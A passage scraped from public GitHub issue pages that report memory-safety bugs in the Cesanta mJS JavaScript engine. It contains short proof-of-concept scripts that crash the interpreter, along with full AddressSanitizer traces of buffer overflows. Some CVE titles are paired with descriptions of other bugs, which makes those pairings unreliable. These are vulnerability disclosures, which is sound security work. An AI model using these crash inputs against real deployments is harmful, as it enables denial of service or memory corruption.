    #2 0x552d2d in mjs\_exec\_file /root/mjs/src/mjs\_exec.c:1096:11
    #3 0x5821d3 in main /root/mjs/src/mjs\_main.c:47:11
    #4 0x7f1016453b96 in \_\_libc\_start\_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
    #5 0x41a2c9 in \_start (/usr/local/bin/mjs+0x41a2c9)

0x00000064c54a is located 54 bytes to the left of global variable '<string literal>' defined in 'src/mjs\_util.c:125:7' (0x64c580) of size 15
  '<string literal>' is ascii string 'src/mjs\_util.c'
0x00000064c54b is located 0 bytes to the right of global variable '<string literal>' defined in 'src/mjs\_util.c:120:30' (0x64c540) of size 11
  '<string literal>' is ascii string '  %-3u %-8s'
SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/common/str\_util.c:180:14 in c\_vsnprintf
Shadow bytes around the buggy address:
  0x0000800c1850: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
  0x0000800c1860: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
  0x0000800c1870: 06 f9 f9 f9 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9
  0x0000800c1880: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
  0x0000800c1890: 00 02 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
=\>0x0000800c18a0: 00 04 f9 f9 f9 f9 f9 f9 00\[03\]f9 f9 f9 f9 f9 f9
  0x0000800c18b0: 00 07 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
  0x0000800c18c0: 07 f9 f9 f9 f9 f9 f9 f9 00 05 f9 f9 f9 f9 f9 f9
  0x0000800c18d0: 00 02 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9
  0x0000800c18e0: 00 00 04 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9
  0x0000800c18f0: 02 f9 f9 f9 f9 f9 f9 f9 02 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==61818==ABORTING

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=60&v=4) hope-fly changed the title Global-buffer-overflow mjs/src/mjs\_string.c:58:15 in mjs\_mk\_string Global-buffer-overflow mjs/src/common/str\_util.c:180:14 in c\_vsnprintf

Dec 31, 2021

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46521: Global-buffer-overflow mjs/src/common/str_util.c:180:14 in c_vsnprintf · Issue #190 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a heap buffer overflow via mjs_disown at src/mjs_core.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_GCC=gcc
DOCKER\_CLANG=clang
$(DOCKER\_GCC) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))(((JSON.stringify - 6.24321e2) - 6.54321e2)(JSON.stringify([1, 2, 3])));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
=================================================================
===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000138 at pc 0x563a2f179088 bp 0x7fff18d361c0 sp 0x7fff18d361b0
READ of size 8 at 0x604000000138 thread T0
    #0 0x563a2f179087 in mjs\_disown src/mjs\_core.c:288
    #1 0x563a2f1c7b54 in mjs\_json\_parse src/mjs\_json.c:480
    #2 0x7fff18d3630f  (<unknown module>)

Address 0x604000000138 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow src/mjs\_core.c:288 in mjs\_disown
Shadow bytes around the buggy address:
  0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c087fff8000: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
  0x0c087fff8010: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
=\>0x0c087fff8020: fa fa fa fa fa fa fa\[fa\]fa fa fa fa fa fa fa fa
  0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46518: Heap-buffer-overflow src/mjs_core.c:288 in mjs_disown · Issue #195 · cesanta/mjs

Cesanta MJS v2.20.0 was discovered to contain a global buffer overflow via mjs_mk_string at mjs/src/mjs_string.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

hope-fly opened this issue

Dec 31, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**mJS revision**

Commit: b1b6eac

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

vim Makefile
DOCKER\_CLANG=clang
$(DOCKER\_CLANG) $(CFLAGS) $(TOP\_MJS\_SOURCES) $(TOP\_COMMON\_SOURCES) -o $(PROG)
# save the makefile then make
make

**Test case**poc.js

    
    (JSON.stringify([1, 2, 3]))((JSON.stringify + 6.54321e2)(JSON.stringify([1, 2, 3])));
​**Execution steps & Output**

$ ./mjs/build/mjs poc.js
=================================================================
==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000064330b at pc 0x0000005b16f4 bp 0x7ffcd99733d0 sp 0x7ffcd99733c8
READ of size 8 at 0x00000064330b thread T0
    #0 0x5b16f3 in mjs\_mk\_string /root/mjs/src/mjs\_string.c:58:15
    #1 0x580796 in mjs\_op\_json\_stringify /root/mjs/src/mjs\_json.c:495:13
    #2 0x55178f in mjs\_exec\_internal /root/mjs/src/mjs\_exec.c:1073:5
    #3 0x552d2d in mjs\_exec\_file /root/mjs/src/mjs\_exec.c:1096:11
    #4 0x5821d3 in main /root/mjs/src/mjs\_main.c:47:11
    #5 0x7f43da272b96 in \_\_libc\_start\_main /build/glibc-2ORdQG/glibc-2.27/csu/../csu/libc-start.c:310
    #6 0x41a2c9 in \_start (/usr/local/bin/mjs+0x41a2c9)

0x00000064330b is located 53 bytes to the left of global variable '<string literal>' defined in 'src/mjs\_builtin.c:140:21' (0x643340) of size 4
  '<string literal>' is ascii string 'ffi'
0x00000064330b is located 5 bytes to the right of global variable '<string literal>' defined in 'src/mjs\_builtin.c:138:21' (0x643300) of size 6
  '<string literal>' is ascii string 'print'
SUMMARY: AddressSanitizer: global-buffer-overflow /root/mjs/src/mjs\_string.c:58:15 in mjs\_mk\_string
Shadow bytes around the buggy address:
  0x0000800c0610: f9 f9 f9 f9 00 00 00 00 00 00 00 05 f9 f9 f9 f9
  0x0000800c0620: 00 06 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800c0630: 00 02 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800c0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800c0650: 07 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
=\>0x0000800c0660: 06\[f9\]f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x0000800c0670: 00 04 f9 f9 f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9
  0x0000800c0680: 07 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x0000800c0690: 03 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 f9 f9 f9 f9
  0x0000800c06a0: 04 f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
  0x0000800c06b0: 06 f9 f9 f9 f9 f9 f9 f9 05 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

Tag

#ubuntu